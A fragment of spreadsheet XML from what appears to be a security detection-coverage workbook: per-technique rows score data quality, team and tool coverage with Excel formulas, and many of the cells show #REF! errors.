        <f t="shared" ref="U3:U66" si="5">IF(T3&lt;0.2,"0-20",IF(T3&lt;0.4,"20-40",IF(T3&lt;0.6,"40-60",IF(T3&lt;0.8,"60-80","80-100"))))</f>
        <v>#REF!</v>
      </c>
      <c r="V3" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F3&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F3))-LEN(SUBSTITUTE(TRIM(F3),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W3" s="18" t="e">
        <f t="shared" ref="W3:W66" si="6">IF(V3&lt;0.2,"0-20",IF(V3&lt;0.4,"20-40",IF(V3&lt;0.6,"40-60",IF(V3&lt;0.8,"60-80","80-100"))))</f>
        <v>#REF!</v>
      </c>
      <c r="X3" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F3&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F3))-LEN(SUBSTITUTE(TRIM(F3),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y3" s="18" t="e">
        <f t="shared" ref="Y3:Y66" si="7">IF(X3&lt;0.2,"0-20",IF(X3&lt;0.4,"20-40",IF(X3&lt;0.6,"40-60",IF(X3&lt;0.8,"60-80","80-100"))))</f>
        <v>#REF!</v>
      </c>
    </row>
    <row r="4" spans="1:25" ht="171" x14ac:dyDescent="0.45">
      <c r="A4" s="8" t="s">
        <v>51</v>
      </c>
      <c r="B4" s="8" t="s">
        <v>3</v>
      </c>
      <c r="C4" s="8" t="s">
        <v>305</v>
      </c>
      <c r="D4" s="10" t="s">
        <v>306</v>
      </c>
      <c r="E4" s="10" t="s">
        <v>307</v>
      </c>
      <c r="F4" s="10" t="s">
        <v>308</v>
      </c>
      <c r="G4" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K4,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H4" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F4&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F4))-LEN(SUBSTITUTE(TRIM(F4),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I4" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F4&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F4))-LEN(SUBSTITUTE(TRIM(F4),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J4" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F4&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F4))-LEN(SUBSTITUTE(TRIM(F4),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K4" s="51">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="L4" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F4&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F4))-LEN(SUBSTITUTE(TRIM(F4),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M4" s="18" t="str">
        <f t="shared" si="1"/>
        <v>0-20</v>
      </c>
      <c r="N4" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F4&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F4))-LEN(SUBSTITUTE(TRIM(F4),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O4" s="18" t="e">
        <f t="shared" si="2"/>
        <v>#REF!</v>
      </c>
      <c r="P4" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F4&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F4))-LEN(SUBSTITUTE(TRIM(F4),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q4" s="18" t="e">
        <f t="shared" si="3"/>
        <v>#REF!</v>
      </c>
      <c r="R4" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F4&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F4))-LEN(SUBSTITUTE(TRIM(F4),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S4" s="18" t="e">
        <f t="shared" si="4"/>
        <v>#REF!</v>
      </c>
      <c r="T4" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F4&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F4))-LEN(SUBSTITUTE(TRIM(F4),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U4" s="18" t="e">
        <f t="shared" si="5"/>
        <v>#REF!</v>
      </c>
      <c r="V4" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F4&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F4))-LEN(SUBSTITUTE(TRIM(F4),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W4" s="18" t="e">
        <f t="shared" si="6"/>
        <v>#REF!</v>
      </c>
      <c r="X4" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F4&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F4))-LEN(SUBSTITUTE(TRIM(F4),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y4" s="18" t="e">
        <f t="shared" si="7"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="5" spans="1:25" ht="57" x14ac:dyDescent="0.45">
      <c r="A5" s="8" t="s">
        <v>218</v>
      </c>
      <c r="B5" s="8" t="s">
        <v>0</v>
      </c>
      <c r="C5" s="8" t="s">
        <v>309</v>
      </c>
      <c r="D5" s="10" t="s">
        <v>310</v>
      </c>
      <c r="E5" s="10" t="s">
        <v>311</v>
      </c>
      <c r="F5" s="10" t="s">
        <v>312</v>
      </c>
      <c r="G5" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K5,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H5" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F5&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F5))-LEN(SUBSTITUTE(TRIM(F5),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I5" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F5&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F5))-LEN(SUBSTITUTE(TRIM(F5),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J5" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F5&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F5))-LEN(SUBSTITUTE(TRIM(F5),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K5" s="51">
        <f>FLOOR(AVERAGE(H5:J5),1)</f>
        <v>0</v>
      </c>
      <c r="L5" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F5&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F5))-LEN(SUBSTITUTE(TRIM(F5),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M5" s="18" t="str">
        <f t="shared" si="1"/>
        <v>0-20</v>
      </c>
      <c r="N5" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F5&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F5))-LEN(SUBSTITUTE(TRIM(F5),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O5" s="18" t="e">
        <f t="shared" si="2"/>
        <v>#REF!</v>
      </c>
      <c r="P5" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F5&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F5))-LEN(SUBSTITUTE(TRIM(F5),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q5" s="18" t="e">
        <f t="shared" si="3"/>
        <v>#REF!</v>
      </c>
      <c r="R5" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F5&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F5))-LEN(SUBSTITUTE(TRIM(F5),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S5" s="18" t="e">
        <f t="shared" si="4"/>
        <v>#REF!</v>
      </c>
      <c r="T5" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F5&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F5))-LEN(SUBSTITUTE(TRIM(F5),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U5" s="18" t="e">
        <f t="shared" si="5"/>
        <v>#REF!</v>
      </c>
      <c r="V5" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F5&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F5))-LEN(SUBSTITUTE(TRIM(F5),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W5" s="18" t="e">
        <f t="shared" si="6"/>
        <v>#REF!</v>
      </c>
      <c r="X5" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F5&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F5))-LEN(SUBSTITUTE(TRIM(F5),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y5" s="18" t="e">
        <f t="shared" si="7"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="6" spans="1:25" ht="85.5" x14ac:dyDescent="0.45">
      <c r="A6" s="8" t="s">
        <v>45</v>
      </c>
      <c r="B6" s="8" t="s">
        <v>7</v>
      </c>
      <c r="C6" s="8" t="s">
        <v>313</v>
      </c>
      <c r="D6" s="10" t="s">
        <v>314</v>
      </c>
      <c r="E6" s="10" t="s">
        <v>315</v>
      </c>
      <c r="F6" s="10" t="s">
        <v>316</v>
      </c>
      <c r="G6" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K6,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H6" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F6&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F6))-LEN(SUBSTITUTE(TRIM(F6),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I6" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F6&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F6))-LEN(SUBSTITUTE(TRIM(F6),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J6" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F6&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F6))-LEN(SUBSTITUTE(TRIM(F6),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K6" s="51">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="L6" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F6&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F6))-LEN(SUBSTITUTE(TRIM(F6),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M6" s="18" t="str">
        <f t="shared" si="1"/>
        <v>0-20</v>
      </c>
      <c r="N6" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F6&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F6))-LEN(SUBSTITUTE(TRIM(F6),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O6" s="18" t="e">
        <f t="shared" si="2"/>
        <v>#REF!</v>
      </c>
      <c r="P6" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F6&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F6))-LEN(SUBSTITUTE(TRIM(F6),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q6" s="18" t="e">
        <f t="shared" si="3"/>
        <v>#REF!</v>
      </c>
      <c r="R6" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F6&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F6))-LEN(SUBSTITUTE(TRIM(F6),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S6" s="18" t="e">
        <f t="shared" si="4"/>
        <v>#REF!</v>
      </c>
      <c r="T6" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F6&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F6))-LEN(SUBSTITUTE(TRIM(F6),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U6" s="18" t="e">
        <f t="shared" si="5"/>
        <v>#REF!</v>
      </c>
      <c r="V6" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F6&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F6))-LEN(SUBSTITUTE(TRIM(F6),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W6" s="18" t="e">
        <f t="shared" si="6"/>
        <v>#REF!</v>
      </c>
      <c r="X6" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F6&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F6))-LEN(SUBSTITUTE(TRIM(F6),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y6" s="18" t="e">
        <f t="shared" si="7"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="7" spans="1:25" ht="114" x14ac:dyDescent="0.45">
      <c r="A7" s="8" t="s">
        <v>136</v>
      </c>
      <c r="B7" s="8" t="s">
        <v>2</v>
      </c>
      <c r="C7" s="8" t="s">
        <v>317</v>
      </c>
      <c r="D7" s="10" t="s">
        <v>318</v>
      </c>
      <c r="E7" s="10" t="s">
        <v>319</v>
      </c>
      <c r="F7" s="10" t="s">
        <v>320</v>
      </c>
      <c r="G7" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K7,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H7" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F7&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F7))-LEN(SUBSTITUTE(TRIM(F7),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I7" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F7&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F7))-LEN(SUBSTITUTE(TRIM(F7),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J7" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F7&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F7))-LEN(SUBSTITUTE(TRIM(F7),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K7" s="51">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="L7" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F7&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F7))-LEN(SUBSTITUTE(TRIM(F7),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M7" s="18" t="str">
        <f t="shared" si="1"/>
        <v>0-20</v>
      </c>
      <c r="N7" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F7&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F7))-LEN(SUBSTITUTE(TRIM(F7),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O7" s="18" t="e">
        <f t="shared" si="2"/>
        <v>#REF!</v>
      </c>
      <c r="P7" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F7&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F7))-LEN(SUBSTITUTE(TRIM(F7),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q7" s="18" t="e">
        <f t="shared" si="3"/>
        <v>#REF!</v>
      </c>
      <c r="R7" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F7&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F7))-LEN(SUBSTITUTE(TRIM(F7),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S7" s="18" t="e">
        <f t="shared" si="4"/>
        <v>#REF!</v>
      </c>
      <c r="T7" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F7&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F7))-LEN(SUBSTITUTE(TRIM(F7),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U7" s="18" t="e">
        <f t="shared" si="5"/>
        <v>#REF!</v>
      </c>
      <c r="V7" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F7&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F7))-LEN(SUBSTITUTE(TRIM(F7),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W7" s="18" t="e">
        <f t="shared" si="6"/>
        <v>#REF!</v>
      </c>
      <c r="X7" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F7&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F7))-LEN(SUBSTITUTE(TRIM(F7),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y7" s="18" t="e">
        <f t="shared" si="7"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="8" spans="1:25" ht="199.5" x14ac:dyDescent="0.45">
      <c r="A8" s="8" t="s">
        <v>145</v>
      </c>
      <c r="B8" s="8" t="s">
        <v>4</v>
      </c>
      <c r="C8" s="8" t="s">
        <v>321</v>
      </c>
      <c r="D8" s="10" t="s">
        <v>322</v>
      </c>
      <c r="E8" s="10" t="s">
        <v>323</v>
      </c>
      <c r="F8" s="10" t="s">
        <v>324</v>
      </c>
      <c r="G8" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K8,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H8" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F8&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F8))-LEN(SUBSTITUTE(TRIM(F8),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I8" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F8&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F8))-LEN(SUBSTITUTE(TRIM(F8),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J8" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F8&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F8))-LEN(SUBSTITUTE(TRIM(F8),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K8" s="51">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="L8" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F8&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F8))-LEN(SUBSTITUTE(TRIM(F8),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M8" s="18" t="str">
        <f t="shared" si="1"/>
        <v>0-20</v>
      </c>
      <c r="N8" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F8&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F8))-LEN(SUBSTITUTE(TRIM(F8),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O8" s="18" t="e">
        <f t="shared" si="2"/>
        <v>#REF!</v>
      </c>
      <c r="P8" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F8&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F8))-LEN(SUBSTITUTE(TRIM(F8),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q8" s="18" t="e">
        <f t="shared" si="3"/>
        <v>#REF!</v>
      </c>
      <c r="R8" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F8&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F8))-LEN(SUBSTITUTE(TRIM(F8),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S8" s="18" t="e">
        <f t="shared" si="4"/>
        <v>#REF!</v>
      </c>
      <c r="T8" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F8&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F8))-LEN(SUBSTITUTE(TRIM(F8),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U8" s="18" t="e">
        <f t="shared" si="5"/>
        <v>#REF!</v>
      </c>
      <c r="V8" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F8&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F8))-LEN(SUBSTITUTE(TRIM(F8),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W8" s="18" t="e">
        <f t="shared" si="6"/>
        <v>#REF!</v>
      </c>
      <c r="X8" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F8&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F8))-LEN(SUBSTITUTE(TRIM(F8),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y8" s="18" t="e">
        <f t="shared" si="7"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="9" spans="1:25" ht="85.5" x14ac:dyDescent="0.45">
      <c r="A9" s="8" t="s">
        <v>88</v>
      </c>
      <c r="B9" s="8" t="s">
        <v>9</v>
      </c>
      <c r="C9" s="8" t="s">
        <v>325</v>
      </c>
      <c r="D9" s="10" t="s">
        <v>326</v>
      </c>
      <c r="E9" s="10" t="s">
        <v>327</v>
      </c>
      <c r="F9" s="10" t="s">
        <v>328</v>
      </c>
      <c r="G9" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K9,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H9" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F9&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F9))-LEN(SUBSTITUTE(TRIM(F9),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I9" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F9&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F9))-LEN(SUBSTITUTE(TRIM(F9),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J9" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F9&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F9))-LEN(SUBSTITUTE(TRIM(F9),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K9" s="51">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="L9" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F9&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F9))-LEN(SUBSTITUTE(TRIM(F9),",",""))+1)</f>
        <v>0</v>
      </c>
